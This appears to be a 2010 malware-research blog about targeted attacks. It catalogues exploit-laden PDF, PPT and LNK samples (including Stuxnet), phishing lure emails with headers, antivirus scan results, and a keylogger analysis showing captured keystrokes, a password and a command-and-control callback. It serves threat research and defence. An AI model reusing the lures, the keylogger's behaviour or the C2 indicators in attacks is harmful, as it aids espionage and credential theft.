CVE-2010-2568 keylogger Win32/Chymine.A

 CVE-2010-2568 - Win32/Chymine.A 

Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems

The credit for this post goes to Extraexploit from extraexploit.blogspot.com. See additional details on his blog

Download bin.exe as a password protected archive  (contact me if you need the password)



ESET New malicious LNKs: here we go…

"At the time of analysis, this threat downloads and install a key stroke logger which we detect as Win32/Spy.Agent.NSO trojan.  The server used to deliver the components used in this attack is presently located in the US, but the IP is assigned to a customer in China. "

F-Secure Win32/Chymine-A

Result: 30/41 (73.18%)
http://www.virustotal.com/analisis/96ec6dc227b3110807d1dd183e802aa4f1271f79cdeaa50e9172065fd5c311f2-1280489604
Antivirus Version Last Update Result
AhnLab-V3 2010.07.30.00 2010.07.29 Dropper/Win32.Chymine
AntiVir 8.2.4.32 2010.07.30 TR/Dldr.Tiny.cmq
Antiy-AVL 2.0.3.7 2010.07.30 Trojan/Win32.Tiny.gen
Avast 4.8.1351.0 2010.07.30 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.30 Win32:Malware-gen
AVG 9.0.0.851 2010.07.30 PSW.Generic8.GRF
BitDefender 7.2 2010.07.30 Trojan.Autorun.ATB
Comodo 5586 2010.07.30 TrojWare.Win32.AntiAV.~G
DrWeb 5.0.2.03300 2010.07.30 Trojan.KeyLogger.8141
Emsisoft 5.0.0.34 2010.07.30 Trojan-Downloader.Win32.Tiny!IK
F-Secure 9.0.15370.0 2010.07.30 Trojan-Spy:W32/Chymine.A
Fortinet 4.1.143.0 2010.07.30 W32/Tiny.CMQ!tr.dldr
GData 21 2010.07.30 Trojan.Autorun.ATB
Ikarus T3.1.1.84.0 2010.07.30 Trojan-Downloader.Win32.Tiny
Jiangmin 13.0.900 2010.07.29 TrojanSpy.KeyLogger.cqyg
Kaspersky 7.0.0.125 2010.07.30 Trojan-Downloader.Win32.Tiny.cmq
McAfee 5.400.0.1158 2010.07.30 Generic Downloader.x!eas
McAfee-GW-Edition 2010.1 2010.07.30 Heuristic.BehavesLike.Win32.CodeInjection.H
Microsoft 1.6004 2010.07.30 Trojan:Win32/Chymine.A
NOD32 5325 2010.07.30 Win32/Spy.Agent.NSO
nProtect 2010-07-30.02 2010.07.30 Trojan.Autorun.ATB
Panda 10.0.2.7 2010.07.29 Trj/ChymineLNK.A
PCTools 7.0.3.5 2010.07.30 Net-Worm.SillyFDC
Rising 22.58.04.05 2010.07.30 Trojan.Win32.Generic.52214029
Sophos 4.56.0 2010.07.30 Mal/Chymin-A
Sunbelt 6663 2010.07.30 Trojan.Win32.Generic!BT
Symantec 20101.1.1.7 2010.07.30 W32.SillyFDC
VBA32 3.12.12.7 2010.07.30 Trojan-Downloader.Tiny.cmq
ViRobot 2010.7.30.3963 2010.07.30 Trojan.Win32.S.Downloader.131584
VirusBuster 5.0.27.0 2010.07.29 Trojan.DL.Tiny.DPT
Additional information
File size: 131584 bytes
MD5...: 3515b1f2ae991fcd64ff4e3b664625c0

Jul 29 CVE-2010-0188 PDF Defense New Thinks

CVE-2010-0188 Unspecified vulnerability in Adobe Reader and Acrobat 8.x before 8.2.1 and 9.x before 9.3.1 allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors

Download  5e0e5951ca4626a891344e38e0085d58 Defense_Attache.pdf  as a password protected archive (please contact me for the password if you need it)

From: Gillian Medina [mailto:gillianmedina@hotmail.com]
Sent: Thursday, July 29, 2010 4:31 AM
To: randolph.strong@us.army.mil
Subject: Defense New Thinks

Defense New Thinks 

  File Defense_Attache.pdf received on 2010.08.02 03:25:36 (UTC)

http://www.virustotal.com/analisis/c6a606ebb758ed5f7e552019d656dab7cda723617819f583ceef797cfc9cfbf5-1280719536
Result: 11/42 (26.2%)
Antiy-AVL    2.0.3.7    2010.08.02    Exploit/Win32.Pidief
Avast    4.8.1351.0    2010.08.02    PDF:CVE-2010-0188
Avast5    5.0.332.0    2010.08.02    PDF:CVE-2010-0188
DrWeb    5.0.2.03300    2010.08.02    Exploit.PDF.1046
eTrust-Vet    36.1.7753    2010.07.31    PDF/CVE-2010-0188!exploit
GData    21    2010.08.02    PDF:CVE-2010-0188
Ikarus    T3.1.1.84.0    2010.08.02    Exploit.Win32.Pidief
Kaspersky    7.0.0.125    2010.08.02    Exploit.Win32.Pidief.dci
McAfee-GW-Edition    2010.1    2010.08.01    Heuristic.BehavesLike.PDF.Suspicious.L
NOD32    5331    2010.08.01    a variant of PDF/CVE-2010-0188
Sophos    4.56.0    2010.08.02    Troj/PDFJs-II
Additional information
File size: 73708 bytes
MD5...: 5e0e5951ca4626a891344e38e0085d58

Headers
Received: from SNT133-W12 ([65.55.90.71]) by snt0-omc2-s32.snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4675);
     Thu, 29 Jul 2010 01:31:18 -0700
Message-ID:
Return-Path: gillianmedina@hotmail.com
Content-Type: multipart/mixed;
    boundary="_e55064e7-b368-4f85-ab6f-7c8fd62fce86_"
X-Originating-IP: [113.225.75.65]
From: Gillian Medina
To:
Subject: Defense New Thinks
Date: Thu, 29 Jul 2010 01:31:18 -0700
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 29 Jul 2010 08:31:18.0425 (UTC) FILETIME=[6A87E890:01CB2EF8]

Hostname:    113.225.75.65
ISP:    China Unicom Liaoning province network
Organization:    China Unicom Liaoning province network
Type:    Broadband
Assignment:    Static IP
State/Region:    Liaoning
City:    Shenyang

This IP is on many blacklists http://www.robtex.com/ip/113.225.75.65.html#blacklists

Jul 28 CVE-2009-4324 PDF 990729 Summary of Network Intelligence from ljw@gsn.gov.tw 210.69.115.235

CVE-2009-4324 Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.

 Download 738af108a6edd46536492b1782589a04 -990729.pdf as a password protected archive (contact me if you need the password)

From: ljw [mailto:ljw@gsn.gov.tw]
Sent: Wednesday, July 28, 2010 11:24 PM
To: agefr6nt@yahoo.com.tw
Subject: 990729網情彙編

 From: ljw [mailto: ljw@gsn.gov.tw]Sent: Wednesday, July 28, 2010 11:24 PMTo: agefr6nt@yahoo.com.twSubject: 990729  Summary of Network Intelligence

Headers

Received: from mail2000.tccg.gov.tw (HELO mail2000.tccg.gov.tw) (210.69.115.235)
  by XXXXXXXXXXXXX
Received: from 192.168.4.154
    by mail2000.tccg.gov.tw with Mail2000 ESMTP Server V4.00S(4662:0:AUTH_LOGIN)
    (envelope-from ); Thu, 29 Jul 2010 17:28:08 +0800 (CST)
Return-Path:
Message-ID: <1975e5623c$23fce32a$0ae1d8b4@nccu212af2ce2>
From: "ljw"
To: ,
BCC:XXXXXXXXXXX
Subject: =?big5?B?OTkwNzI5uvSxobdKvXM=?=
Date: Thu, 29 Jul 2010 11:24:22 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_000_0033_01CB2F10.990CB480"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
 (210.69.115.235)
Hostname:    mail2000.tccg.gov.tw
ISP:    GSN, Taiwan Government Service Network.
Organization:    Taichung City Government
Country:    Taiwan

File name:
http://www.virustotal.com/file-scan/report.html?id=c1d9cd02799bbb45aa6a37a16f2da1dca86f55e474b0a33e0034232c176b5f99-1280460987
-990729.pdf
Submission date:
2010-07-30 05:36:27 (UTC)
12 /42 (28.6%)
Authentium     5.2.0.5     2010.07.30     JS/Pdfka.V
Avast     4.8.1351.0     2010.07.30     JS:Pdfka-gen
Avast5     5.0.332.0     2010.07.30     JS:Pdfka-gen
AVG     9.0.0.851     2010.07.29     Exploit.PDF
BitDefender     7.2     2010.07.30     Exploit.PDF-JS.Gen
eTrust-Vet     36.1.7750     2010.07.30     PDF/CVE-2010-1297.B!exploit  - NOT
F-Prot     4.6.1.107     2010.07.30     JS/Pdfka.V
F-Secure     9.0.15370.0     2010.07.30     Exploit.PDF-JS.Gen
GData     21     2010.07.30     Exploit.PDF-JS.Gen
McAfee-GW-Edition     2010.1     2010.07.29     Heuristic.BehavesLike.PDF.Suspicious.O
Norman     6.05.11     2010.07.29     JS/Shellcode.IZ
nProtect     2010-07-30.01     2010.07.30     Exploit.PDF-JS.Gen
Additional information
Show all
MD5   : 738af108a6edd46536492b1782589a04

==============================================================

Windows XP SP2 Adobe Reader 9.1

Files created

%tmp%\jqc.exe

%tmp%\1,pdf 

1.pdf
http://www.virustotal.com/file-scan/report.html?id=26a0711f9cb1dc0d53e524ed9b90f3356c8e5c4c4b6da942d8371662e800fcd5-1282796454

jqc.exe

http://www.virustotal.com/file-scan/report.html?id=7224943665fb630f371aeef1f8d6402ce4e53150c1fd8ff044977c659b514fdd-1282796115
AntiVir 8.2.4.38 2010.08.25 BDS/Ixeshe.A.20
Authentium 5.2.0.5 2010.08.26 W32/Heuristic-245!Eldorado
Avast 4.8.1351.0 2010.08.25 Win32:Rootkit-gen
Avast5 5.0.594.0 2010.08.25 Win32:Rootkit-gen
BitDefender 7.2 2010.08.26 Trojan.Generic.4549982
CAT-QuickHeal 11.00 2010.08.24 Backdoor.Ixeshe.a
ClamAV 0.96.2.0-git 2010.08.26 PUA.Packed.ASPack
Emsisoft 5.0.0.37 2010.08.26 Backdoor.Win32.Ixeshe!IK
F-Prot 4.6.1.107 2010.08.26 W32/Heuristic-245!Eldorado
F-Secure 9.0.15370.0 2010.08.26 Trojan.Generic.4549982
Fortinet 4.1.143.0 2010.08.25 W32/PdfExDr.B!tr
GData 21 2010.08.26 Trojan.Generic.4549982
Ikarus T3.1.1.88.0 2010.08.26 Backdoor.Win32.Ixeshe
Microsoft 1.6103 2010.08.25 Backdoor:Win32/Ixeshe.A
NOD32 5397 2010.08.25 probably a variant of Win32/Ixeshe.A
nProtect 2010-08-25.02 2010.08.25 Trojan.Generic.4549982
Panda 10.0.2.7 2010.08.25 Trj/CI.A
PCTools 7.0.3.5 2010.08.26 Trojan.Gen
Sophos 4.56.0 2010.08.26 Mal/PdfExDr-B
Sunbelt 6795 2010.08.26 Trojan.Win32.Generic!BT
Symantec 20101.1.1.7 2010.08.26 Trojan.Gen
TrendMicro 9.120.0.1004 2010.08.26 TSPY_AGENT.AVEP
TrendMicro-HouseCall 9.120.0.1004 2010.08.26 TSPY_AGENT.AVEP
VBA32 3.12.14.0 2010.08.25 Trojan-Downloader.Dreamtouch.xb
VirusBuster 5.0.27.0 2010.08.25 Trojan.Ixeshe.Z
Additional informationShow all 
MD5   : d27e5643f1e5422be6cba2d98506ebbf

• CWanalysis http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=69268965&cs=EAFC7E20EB976E4A740E9C95F733A8C2
• Threatexpert report http://www.threatexpert.com/report.aspx?md5=d27e5643f1e5422be6cba2d98506ebbf

120.126.54.189
Hostname:    ymu054-189.ym.edu.tw
ISP:    Ministry of Education Computer Center
Organization:    Ministry of Education Computer Center
Country:    Taiwan

• Outgoing Connections






• HTTP Data






• Method: GET
• Url: 120.126.54.189/AWS7838.jsp?2al314Le1g0315QgjaZ/I5Rojs9Khs9fI/xoIOmM=k+ojnhT
• HTTP Version: HTTP/1.1




• Header Data





• x_bigfix_client_string: 2al314Le1g0315QgjaZ/qDAA
• User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
• Host: oltnsck.dnsrd.com
• Connection: Keep-Alive

 http://www.robtex.com/dns/oltnsck.dnsrd.com.html

oltnsck.dnsrd.com

Incoming mail for oltnsck.dnsrd.com is handled by one mail server at dnsrd.com. Oltnsck.dnsrd.com has one IP number (120.126.34.94) , but the reverse is ymu034-094.ym.edu.tw.

Ymu034-094.ym.edu.tw point to the same IP. Oltnsck.dnsrd.com use this as a mail server.

dnsrd.com

Dnsrd.com is a domain controlled by three name servers at changeip.org. Two of them are on the same IP network. The primary name server is ns3.changeip.org. Incoming mail for dnsrd.com is handled by one mail server at changeip.com. Dnsrd.com has one IP number (204.16.173.30).

More information

oltnsck.dnsrd.com is hosted on a server in Taiwan

Transport Protocol: TCP
Remote Address: 140.112.155.252
Remote Port: 80
Protocol: HTTP
Connection Established: 0
Socket: 2020


Hostname:    140.112.155.252
ISP:    National Taiwan University

Organization:    National Taiwan University
Country:    Taiwan

APT Activity Monitor / keylogger

Here is a small piece of APT type malware, which records all user activities and keystrokes, including passwords. The attacker needs to execute it and it will create a hidden folder in the same directory named mssvr and a text log file called Updaterinfo.dat. The log can be sent or downloaded later using other means (look for a file named send1.exe, for example  - never mind, send1.exe does not appear to have any sending abilities). There are usually many other files associated with the attack - backdoors, misc installers, command interpreters, etc.  The Anubis report is brief and clear - see it posted below in full. The binary and mssvr folder can be anywhere, in some temp folder, for example.

mssvr 

mssvr\UpdaterInfo.dat ]

Fixed the archive, re-download it if you could not open it before

Download  dc281590aa9153000e983622f0559ea1 Adobeinfo.exe  ac as a password protected archive (please contact me for the password if you need it)
Two name variants known (but there can be an endless list) are Adobeinfo.exe and lognoreg.exe.

VT
http://www.virustotal.com/analisis/459441e13e339640e0c34530a9b5dcdf959c573f638258073882756d90b8e612-1280034705
 File AdobeInfo.exe received on 2010.07.25 05:11:45 (UTC)
Current status: finished
Result: 0/42 (0.00%)
Additional information
File size: 16384 bytes
MD5   : dc281590aa9153000e983622f0559ea1


Example of a log UpdaterInfo.dat in mssvr folder, note the way passwords are captured - in the bottom of this log.

--- 20100727 13:07:47 ----------------
11:06:47 The Active Windows Title: PC21330
11:06:03 The Active Windows Title: Inbox - Microsoft Outlook
11:06:05 The Active Windows Title: RE: Meeting tomorrow : Budget 2011- Message (HTML)
Let's meet before the meeting, maybe around 3 pm today. By the way I am still waiting for Brian's reply, he never called me back, do you have his secretary's number?

11:06:48 The Active Windows Title: Microsoft Access - Events_Records : Database (Access 2000 file format)
I will send you the agenda in a minute
11:06:55 The Active Windows Title: Find and Replace
[CTRL]f
July 23
11:06:07 The Active Windows Title: Find and Replace
....
12:06:37 The Active Windows Title: Microsoft Excel - InvitationListDetails.xlsx
12:06:06 The Active Windows Title: Microsoft Excel - invoicelist.xlsx
12:06:10 The Active Windows Title: Microsoft Excel - invoicelist.xlsx.xlsx
$16,000
 item
.....
12:06:11 The Active Windows Title: Save As
12:06:15 The Active Windows Title: Microsoft Excel - InvidtationListDetails
12:06:56 The Active Windows Title: \\FILESRV002\DATA\DEPARTMENTS\STRATCMD-S
[CTRL]c.xlsx
12:06:27 The Active Windows Title: Windows Internet Explorer
Taxi 20006
12:06:52 The Active Windows Title: taxi phone number zip code 20001 - Google Search - Microsoft Internet Explorer
12:06:04 The Active Windows Title: @@To Do list - Microsoft Outlook
oil production
12:06:10 The Active Windows Title: Untitled - Message (Plain Text)
12:06:16 The Active Windows Title: Amanda Smith
Jenn
12:06:56 The Active Windows Title: Untitled - Message (Plain Text)
15:06:36 The Active Windows Title: Google - Microsoft Internet Explorer
https://mail.acme.com
AJohnson
Summer2010WorldCup$$

Or this is from a VM

Some strings

GetModuleHandleA
GetStartupInfoA
[Up]
[Num Lock]
[Down]
[Right]
[UP]
[Left]
[PageDown]
[End]
[Del]
[PageUp]
[Home]
[Insert]
[Scroll Lock]
[Print Screen]
[WIN]
[CTRL]
[TAB]
[F12]
[F11]
[F10]
[F9]
[F8]
[F7]
[F6]
[F5]
[F4]
[F3]
[F2]
[F1]
[ESC]
---- %04d%02d%02d %02d:%02d:%02d ----------------
\UpdaterInfo.dat
\mssvr
The Active Windows Title: %s
%02d:%02d:%02d
%s
%s

Unicode Strings:

Anubis Report
http://anubis.iseclab.org/?action=result&task_id=110a3a724ca9ad1e4250755391cf1e4bf

[#############################################################################]
    2. AdobeInfo..exe
[#############################################################################]
[=============================================================================]
    General information about this executable
[=============================================================================]
        Analysis Reason: Primary Analysis Subject
        Filename:        AdobeInfo..exe
        MD5:             dc281590aa9153000e983622f0559ea1
        SHA-1:           9945f8bf55a81b0e201fad167577d49b37079bd4
        File Size:       16384 Bytes
        Command Line:    "C:\AdobeInfo..exe" 
        Process-status
        at analysis end: alive
        Exit Code:       0

[=============================================================================]
    Load-time Dlls
[=============================================================================]
        Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
               Base Address: [0x7C900000 ], Size: [0x000AF000 ]
        Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
               Base Address: [0x7C800000 ], Size: [0x000F6000 ]
        Module Name: [ C:\WINDOWS\system32\USER32.dll ],
               Base Address: [0x7E410000 ], Size: [0x00091000 ]
        Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
               Base Address: [0x77F10000 ], Size: [0x00049000 ]
        Module Name: [ C:\WINDOWS\system32\MSVCRT.dll ],
               Base Address: [0x77C10000 ], Size: [0x00058000 ]

[=============================================================================]
    2.a) AdobeInfo..exe - Registry Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Registry Values Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ], 
             Value Name: [ TSAppCompat ], Value: [ 0 ], 2 times


[=============================================================================]
    2.b) AdobeInfo..exe - File Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Files Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\mssvr ]
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Files Read:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Files Modified:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Directories Created:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Directory: [ C:\\mssvr ]

[=============================================================================]
    2.c) AdobeInfo..exe - Other Activities
[=============================================================================]
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
    Keyboard Keys Monitored:
[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]
        Virtual Key Code: [ VK_SHIFT (16) ], 70585 times
        Virtual Key Code: [ VK_BACK (8) ], 743 times
        Virtual Key Code: [ VK_RETURN (13) ], 743 times
        Virtual Key Code: [ VK_ESCAPE (27) ], 743 times
        Virtual Key Code: [ VK_F1 (112) ], 743 times
        Virtual Key Code: [ VK_F2 (113) ], 743 times
        Virtual Key Code: [ VK_F3 (114) ], 743 times
        Virtual Key Code: [ VK_F4 (115) ], 743 times
        Virtual Key Code: [ VK_F5 (116) ], 743 times
        Virtual Key Code: [ VK_F6 (117) ], 743 times
        Virtual Key Code: [ VK_F7 (118) ], 743 times
        Virtual Key Code: [ VK_F8 (119) ], 743 times
        Virtual Key Code: [ VK_F9 (120) ], 743 times
        Virtual Key Code: [ VK_F10 (121) ], 743 times
        Virtual Key Code: [ VK_F11 (122) ], 743 times
        Virtual Key Code: [ VK_F12 (123) ], 743 times
        Virtual Key Code: [ VK_OEM_3 (192) ], 743 times
        Virtual Key Code: [ VK_1 (49) ], 743 times
        Virtual Key Code: [ VK_2 (50) ], 743 times 

Advanced Persistent Threat / Targeted Attacks / APT Malware links

Here is a collection of links about  Advanced Persistent Threat malware and attacks. I think I missed a few hundred, please send more. thanks, Mila

General

• Investigating China’s Online Underground Economy by Zhuge Jianwei, Gu Liang, and Duan Haixin July 2012  Not quite APT but related to China-made malware

Specific malware families and trojans

• Chasing APT Joe Stewart, Dell SecureWorks Counter Threat Unit™ Threat Intelligence 2012
• A time-based analysisof Rich Text Format manipulations:a deeper analysisof the RTF exploit CVE-2010-3333 -Sophos  Again, not quite APT but CVE-2010-3333 has been use extensively by APT actors
• Adding Android and Mac OS X Malwareto the APT Toolbox Trend Micro 2012
• IXESHE An APT Campaign By: David Sancho, Jessa dela Torre, Matsukawa Bakuei,Nart Villeneuve, and Robert McArdle - Trend Micro 2012
• Anatomy of a Gh0st RAT McAfee By Michael G. Spohn
• Command and Control in the Fifth Domain - Command Five Pty Ltd
• The ‘Madi’ infostealers - a detailed analysis by Kaspersky

Stuxnet, Duqu, Flame, Gauss ..

• Flame's code injection techniques by Polska CERT
• Gauss:Abnormal Distribution by Kaspersky 
• Stuxnet/Duqu: The Evolution of Drivers by Kaspersky

OLD(ER) 2010 and before

Shadowserver

SHADOWS IN THE CLOUD: Investigating Cyber Espionage 2.0 Report
Shadows in the Cloud: An investigation into cyber espionage 2.0
Cyber Espionage: Death by 1000 Cuts

Raytheon
The Advanced Persistent Threat (or Informatonized Force Operatons) Michael K. Daly

Mandiant

Combat the APT by Sharing Indicators of Compromise
Malware Behaving Badly: Preview
Blackhat Europe, State Of Malware: Family Ties
Advanced Persistent Threat Report







Symantec
The Hackers Behind Stuxnet  Patrick Fitzgerald

SANS computer forensics
Security Intelligence: Introduction (pt 1)
Security Intelligence: Introduction (pt 2)
Security Intelligence: Attacking the Kill Chain
Security Intelligence: Defining APT Campaigns

Digital Bond
Trojan Targeting Siemens and APT Thoughts  Dale Peterson

Threatchaos.com   IT--Harvest
35 Steps to Protect Yourself from Cyber Espionage Richard Stiennon

Project Grey Goose
Project Grey Goose: Phase I ReportProject Grey Goose Phase II Report: The evolving state of cyber warfare

Information Security
Understanding the advanced persistent threat Richard Bejtlich 

HBGary, Inc.
Advanced Persistent Threat What APT Means to Your Enterprise Greg Hoglund

Cassandra Security
All Advanced Persistent Threat articles

Netwitness
All Advanced Persistent Threat articles 

Google
A new approach to China 

TaoSecurity
You Down with APT? Richard Bejtlich
All Advanced Persistent Threat articles

Johnny Cocaine Internet Cowboy
Losing the cyberwar

MadMark's Blog
Google / Adobe Hacking Event Follow-up – APT Malware

ViCheck Malware Trends
APT Malware Trends

RiskPundit
Advanced Persistent Threat (APT)

Infowar Monitor
All Articles about espionage


Threatpost
Lab Matters: Inside Targeted Attacks

Threatexpert
Trojan Hydraq exposed

c-APT-ure
c-apt-ure.blogspot.com

 

Jul 15 CVE-2009-0556 PPT North Korean Nuclear Update from david.alton33@hotmail.com

CVE-2009-0556 Microsoft Office PowerPoint 2000 SP3, 2002 SP3, and 2003 SP3, and PowerPoint in Microsoft Office 2004 for Mac, allows remote attackers to execute arbitrary code via a PowerPoint file with an OutlineTextRefAtom containing an an invalid index value that triggers memory corruption, as exploited in the wild in April 2009 by Exploit:Win32/Apptom.gen, aka "Memory Corruption Vulnerability."

Download  Nuclear_report.pps 71803d893ed7d052fdb58f10da200fe9 as a password protected archive (contact me if you need the password)

From: David Alton [mailto:david.alton33@hotmail.com]
Sent: Thursday, July 15, 2010 4:03 AM
To: xxxxxxxxxx
Subject: North Korean Nuclear Update.

 
Recently U.S Secretary of State Hillary Clinton has said North
Korea as many as six nuclear weapons.
 
Attached please find Koreatimes`s article about North Korea`s
Nuclear issue...   I believe it could be of your interest and helpful for reviewing
the NK Nuclear activities.
 ___________________________________
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.

 File Nuclear_report.pps received on 2010.07.21 11:33:22 (UTC)

http://www.virustotal.com/analisis/3bb1d1d441ab7412ca429ec2db6dbcf48e2b19323bf589d37698e76dc305044f-1279712002
Result: 11/42 (26.2%)
BitDefender    7.2    2010.07.21    Exploit.PPT.Gen
Emsisoft    5.0.0.34    2010.07.21    Exploit.MSPPoint.Agent!IK
F-Secure    9.0.15370.0    2010.07.21    Exploit.PPT.Gen
GData    21    2010.07.21    Exploit.PPT.Gen
Ikarus    T3.1.1.84.0    2010.07.21    Exploit.MSPPoint.Agent
Kaspersky    7.0.0.125    2010.07.21    Exploit.MSPPoint.Agent.x
McAfee-GW-Edition    2010.1    2010.07.21    Heuristic.BehavesLike.Exploit.P97.CodeExec.PGPG
Norman    6.05.11    2010.07.20    ShellCode.D
nProtect    2010-07-21.01    2010.07.21    Exploit.PPT.Gen
Sophos    4.55.0    2010.07.21    Troj/ExpPPT-A
TrendMicro-HouseCall    9.120.0.1004    2010.07.21    HEUR_OLEXP.B
Additional information
File size: 838144 bytes
MD5...: 71803d893ed7d052fdb58f10da200fe9

Headers

X-Originating-IP: [119.247.93.218]
From: David Alton
To: xxxxxxxxxxxx
Subject: North Korean Nuclear Update.
Date: Thu, 15 Jul 2010 20:03:21 +1200
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 15 Jul 2010 08:03:21.0286 (UTC) FILETIME=[31184E60:01CB23F4]

Hostname:    119247093218.ctinets.com
ISP:    City Telecom (H.K.) Ltd.
Organization:    City Telecom (H.K.) Ltd.
Type:    Broadband
Assignment:    Static IP
Country:    Hong Kong hk flag
City:    Tin Shui Wai

  

CVE-2010-2568 (LNK vunerability) Zero Day Stuxnet-A Sample + PoC by Ivanlef0u + Links

CVE-2010-2568  -- Reserved --

Microsoft Security Advisory (2286198) Microsoft is investigating reports of limited, targeted attacks exploiting a vulnerability in Windows Shell, a component of Microsoft Windows. This advisory contains information about which versions of Windows are vulnerable as well as workarounds and mitigations for this issue.

The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited. For Windows 7 systems, AutoPlay functionality for removable disks is automatically disabled.

Download 74ddc49a7c121a61b8d06c03f92d0c13 Stuxnet-A ac as a password protected archive (please contact me for the password if you need it)

Collection of links (in no particular order)

1. Ivanlef0u's Blog CVE-2010-2568 shorcut Lnk + PoC (Google translated to English)
2. Exploitdb Microsoft Windows Automatic LNK Shortcut File Code Execution (PoC by Ivanf0u)
3. Microsoft Security Advisory (2286198) Vulnerability in Windows Shell Could Allow Remote Code Execution
4. Brian Krebs Experts Warn of New Windows Shortcut Flaw
5. InReverse  About TmpHider/Stuxnet #1 by swirl
6. Wilders Security Forums - Rootkit.TmpHider
7. Microsoft Malware Protection Center - The Stuxnet Sting
8. Microsoft Malware Protection Center - WinNT/Stuxnet.A
9. Threatexpert - Win32/Stuxnet.A
10. ESET (Windows) Shellshocked, Or Why Win32/Stuxnet Sux… by David Harley (with special thanks to Juraj Malcho, Aleksander Matrosov and their colleagues)
11. Aleksander Matrosov http://twitpic.com/24z86b "Rootkit.TmpHider is signed with signature of Realtek Corp" http://bit.ly/a1BHaZ" /via @_MDL_ 
12. Sophos Windows shortcut vulnerability with rootkit - detailed video demo 
13. Mitigating .LNK Exploitation With Ariad — Didier Stevens 
14. Internet Storm Center Vulnerability in Windows "LNK" files?  by Joel Esler and Bojan
15. Windows zero-day attack works on all Windows systems by Chester Wisniewski
16. Stuxnet is a directed attack -- 'hack of the century' by Ralph Langner (new)

 http://www.threatexpert.com/report.aspx?md5=74ddc49a7c121a61b8d06c03f92d0c13

Submission details: Submission received: 13 July 2010, 18:26:36 Processing time: 6 min 45 sec Submitted sample: File MD5: 0x74DDC49A7C121A61B8D06C03F92D0C13 File SHA-1: 0x0CCBC128DD8BF73DC7B3922FB67D26BBCDBCAA89 Filesize: 517,632 bytes Alias: Trojan.Gen [PCTools] Trojan.Gen [Symantec] TrojanDropper:Win32/Stuxnet.A [Microsoft] Summary of the findings: What's been found Severity Level Contains characteristics of an identified security risk. Technical Details: Possible Security Risk Attention! The following threat category was identified: Threat Category Description A malicious trojan horse or bot that may represent security risk for the compromised system and/or its network environment File System Modifications The following files were created in the system: # Filename(s) File Size File Hash Alias 1 %Windir%\inf\mdmcpq3.PNF 6,623 bytes MD5: 0x0DD2AF5AFE93118073CB656D813435A4 SHA-1: 0x256AC5228427FCD03FB9EC1871B15FD76E4D0879 (not available) 2 %Windir%\inf\mdmeric3.PNF 90 bytes MD5: 0xB834EBEB777EA07FB6AAB6BF35CDF07F SHA-1: 0xF7B86531AD78EB283E59091A1C64B0C47D50E6C6 (not available) 3 %Windir%\inf\oem6C.PNF 323,848 bytes MD5: 0xFA4381DF1F7F89077439A596630D5647 SHA-1: 0x152B6830777E7F2B214708A21BA28F9D625E5E16 (not available) 4 